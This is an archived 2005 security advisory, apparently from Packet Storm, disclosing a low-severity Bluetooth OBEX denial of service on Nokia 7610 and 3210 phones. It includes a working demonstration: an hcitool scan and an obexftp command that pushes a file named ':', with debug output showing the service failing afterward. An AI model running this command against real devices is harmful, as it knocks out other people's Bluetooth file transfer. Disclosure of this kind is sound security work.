what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nokiaDoS.txt

nokiaDoS.txt
Posted Sep 27, 2005
Authored by Alejandro Ramos | Site unsec.net

Nokia models 7610 and 3210 suffer from a denial of service flaw in the OBEX implementation.

tags | advisory, denial of service
SHA-256 | b0c97ab211f95b643a9aa6908eb8776121e799c92c0cdadae2646cd6c154ba66

nokiaDoS.txt

Change Mirror Download
Title: Nokia 7610, 3210 Denial of Service in OBEX.
Severity: Low
Affected: tested in nokia 7610 and nokia 3210 (maybe others symbian
phones).
Problem type: remote

Details:
----------------------------------------------------------------------------------------------------------

They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disable this service if you send
archive with name ":" or "\".

----
Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ‘:’, ‘/’ or ‘\’. Objects with
improperly formed names should be rejected."
----

The device ask for PIN if you are not paired or ask if you want accept a
connection of the remote box, you need ACCEPT. It have low risk ,
becouse dont work if you dont accept the incoming connection.

If connection is established, the file is sended and they arent "New
message arrived" message, like when you send correct archive. Its ok,
the filename is dropped.

The problem is the OBEX service dont work anymore after this, if you
tried to send other file or from some vcard from other device, you cant
connect to the remote OBEX service again.

Demostration with Linux as client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
----------------------------------------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


--
A. Ramos.
mailto: <aramosf@unsec.net>
http://www.unsec.net
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close